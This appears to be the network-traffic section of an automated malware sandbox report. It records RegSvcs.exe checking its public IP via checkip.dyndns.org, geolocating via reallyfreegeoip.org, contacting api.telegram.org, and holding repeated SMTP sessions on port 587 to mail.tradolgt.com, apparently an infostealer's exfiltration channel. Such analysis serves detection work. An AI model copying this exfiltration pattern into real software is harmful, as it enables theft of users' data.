                                                                                                                      Jan 3, 2025 09:52:56.691353083 CET58750057208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:52:56.694657087 CET50057587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:52:57.230453968 CET58750057208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:52:57.230603933 CET50057587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:52:57.235493898 CET58750057208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:52:57.376312017 CET58750057208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:52:57.376480103 CET50057587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:52:57.381227970 CET58750057208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:52:57.522917032 CET58750057208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:52:57.523377895 CET50057587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:52:57.528136969 CET58750057208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:52:57.681016922 CET58750057208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:52:57.681082964 CET58750057208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:52:57.681094885 CET58750057208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:52:57.681130886 CET50057587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:52:57.681159973 CET58750057208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:52:57.681225061 CET50057587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:52:57.683196068 CET50057587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:52:57.687957048 CET58750057208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:52:57.828886032 CET58750057208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:52:57.833636999 CET50057587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:52:57.838517904 CET58750057208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:52:57.979322910 CET58750057208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:52:57.980688095 CET50057587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:52:57.985467911 CET58750057208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:52:58.126471996 CET58750057208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:52:58.126703024 CET50057587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:52:58.131508112 CET58750057208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:00.339062929 CET58750057208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:00.339243889 CET50057587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:00.344397068 CET58750057208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:00.484842062 CET58750057208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:00.485685110 CET58750057208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:00.485817909 CET50057587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:00.485817909 CET50057587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:00.486568928 CET50058587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:00.490782976 CET58750057208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:00.491871119 CET58750058208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:00.494654894 CET50058587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:01.035149097 CET58750058208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:01.101700068 CET50058587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:01.106678009 CET58750058208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:01.248416901 CET58750058208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:01.338555098 CET50058587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:01.594805002 CET50058587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:01.599809885 CET58750058208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:01.747167110 CET58750058208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:01.836483002 CET50058587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:01.841430902 CET58750058208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:01.992160082 CET58750058208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:01.992177963 CET58750058208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:01.992191076 CET58750058208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:01.992228985 CET50058587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:01.996104002 CET50058587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:02.000896931 CET58750058208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:02.142736912 CET58750058208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:02.145538092 CET50058587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:02.150331974 CET58750058208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:02.292220116 CET58750058208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:02.292632103 CET50058587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:02.297445059 CET58750058208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:02.443419933 CET58750058208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:02.443852901 CET50058587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:02.448687077 CET58750058208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:03.385780096 CET50058587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:03.387084961 CET50059587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:03.390856981 CET58750058208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:03.390923023 CET50058587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:03.391921997 CET58750059208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:03.394721985 CET50059587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:03.984966993 CET58750059208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:03.987943888 CET50059587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:04.001468897 CET58750059208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:04.147802114 CET58750059208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:04.147960901 CET50059587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:04.152791023 CET58750059208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:04.298666954 CET58750059208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:04.494978905 CET50059587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:04.812594891 CET50059587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:04.813163042 CET50059587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:04.814527035 CET50060587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:04.908107996 CET58750059208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:04.908138990 CET58750060208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:04.908299923 CET58750059208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:04.908356905 CET50060587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:04.908412933 CET50059587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:05.523578882 CET58750060208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:05.523993969 CET50060587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:05.528778076 CET58750060208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:05.669959068 CET58750060208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:05.670716047 CET50060587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:05.675513983 CET58750060208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:05.817783117 CET58750060208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:05.818211079 CET50060587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:05.823015928 CET58750060208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:05.973527908 CET58750060208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:05.973567963 CET58750060208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:05.973578930 CET58750060208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:05.973717928 CET50060587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:05.975142002 CET50060587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:05.979871035 CET58750060208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:06.120930910 CET58750060208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:06.121922016 CET50060587192.168.2.5208.91.199.115
                                                                                                                      Jan 3, 2025 09:53:06.126794100 CET58750060208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:06.267869949 CET58750060208.91.199.115192.168.2.5
                                                                                                                      Jan 3, 2025 09:53:06.307421923 CET50060587192.168.2.5208.91.199.115
                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Jan 3, 2025 09:48:59.576112986 CET6410153192.168.2.51.1.1.1
                                                                                                                      Jan 3, 2025 09:48:59.582983017 CET53641011.1.1.1192.168.2.5
                                                                                                                      Jan 3, 2025 09:49:00.524463892 CET4950853192.168.2.51.1.1.1
                                                                                                                      Jan 3, 2025 09:49:00.533766985 CET53495081.1.1.1192.168.2.5
                                                                                                                      Jan 3, 2025 09:49:11.368176937 CET6535153192.168.2.51.1.1.1
                                                                                                                      Jan 3, 2025 09:49:11.375361919 CET53653511.1.1.1192.168.2.5
                                                                                                                      Jan 3, 2025 09:49:18.672430038 CET5421353192.168.2.51.1.1.1
                                                                                                                      Jan 3, 2025 09:49:19.099406004 CET53542131.1.1.1192.168.2.5
                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Jan 3, 2025 09:48:59.576112986 CET192.168.2.51.1.1.10xd14dStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                      Jan 3, 2025 09:49:00.524463892 CET192.168.2.51.1.1.10xf3bbStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                      Jan 3, 2025 09:49:11.368176937 CET192.168.2.51.1.1.10x6831Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                      Jan 3, 2025 09:49:18.672430038 CET192.168.2.51.1.1.10x432fStandard query (0)mail.tradolgt.comA (IP address)IN (0x0001)false
                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Jan 3, 2025 09:48:59.582983017 CET1.1.1.1192.168.2.50xd14dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Jan 3, 2025 09:48:59.582983017 CET1.1.1.1192.168.2.50xd14dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                      Jan 3, 2025 09:48:59.582983017 CET1.1.1.1192.168.2.50xd14dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                      Jan 3, 2025 09:48:59.582983017 CET1.1.1.1192.168.2.50xd14dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                      Jan 3, 2025 09:48:59.582983017 CET1.1.1.1192.168.2.50xd14dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                      Jan 3, 2025 09:48:59.582983017 CET1.1.1.1192.168.2.50xd14dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                      Jan 3, 2025 09:49:00.533766985 CET1.1.1.1192.168.2.50xf3bbNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                      Jan 3, 2025 09:49:00.533766985 CET1.1.1.1192.168.2.50xf3bbNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                      Jan 3, 2025 09:49:11.375361919 CET1.1.1.1192.168.2.50x6831No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                      Jan 3, 2025 09:49:19.099406004 CET1.1.1.1192.168.2.50x432fNo error (0)mail.tradolgt.com208.91.199.115A (IP address)IN (0x0001)false
                                                                                                                      • reallyfreegeoip.org
                                                                                                                      • api.telegram.org
                                                                                                                      • checkip.dyndns.org
                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.549704132.226.247.73806504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 3, 2025 09:48:59.593491077 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 3, 2025 09:49:00.267025948 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Fri, 03 Jan 2025 08:49:00 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                      Jan 3, 2025 09:49:00.270973921 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Jan 3, 2025 09:49:00.486212015 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Fri, 03 Jan 2025 08:49:00 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                      Jan 3, 2025 09:49:01.195245028 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Jan 3, 2025 09:49:01.405169010 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Fri, 03 Jan 2025 08:49:01 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.549707132.226.247.73806504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 3, 2025 09:49:02.008567095 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Jan 3, 2025 09:49:02.689888954 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Fri, 03 Jan 2025 08:49:02 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.549709132.226.247.73806504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 3, 2025 09:49:03.336138010 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 3, 2025 09:49:04.042382956 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Fri, 03 Jan 2025 08:49:03 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      3192.168.2.549711132.226.247.73806504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 3, 2025 09:49:04.638973951 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 3, 2025 09:49:05.329762936 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Fri, 03 Jan 2025 08:49:05 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.2.549713132.226.247.73806504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 3, 2025 09:49:05.976403952 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 3, 2025 09:49:06.679708958 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Fri, 03 Jan 2025 08:49:06 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      5192.168.2.549715132.226.247.73806504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 3, 2025 09:49:07.298449039 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 3, 2025 09:49:07.991692066 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Fri, 03 Jan 2025 08:49:07 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      6192.168.2.549717132.226.247.73806504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 3, 2025 09:49:08.687083960 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 3, 2025 09:49:09.378616095 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Fri, 03 Jan 2025 08:49:09 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      7192.168.2.549719132.226.247.73806504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 3, 2025 09:49:10.012919903 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 3, 2025 09:49:10.682611942 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Fri, 03 Jan 2025 08:49:10 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.549705188.114.97.34436504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-03 08:49:01 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2025-01-03 08:49:01 UTC855INHTTP/1.1 200 OK
                                                                                                                      Date: Fri, 03 Jan 2025 08:49:01 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1208930
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mDjzTaQ3JQMluFcl4980%2F8CO9NJB2c543pHGKk3f9WX0Ao6KUk8X87gwe2aBfAIGYegzKwPabq8TRTzO5McAwO8IXfxul3NJUvI2fNjQdfvmDp0LJm8x1PG0HbD%2B0%2FWJj7IPcpLY"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fc1bbae091518c8-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
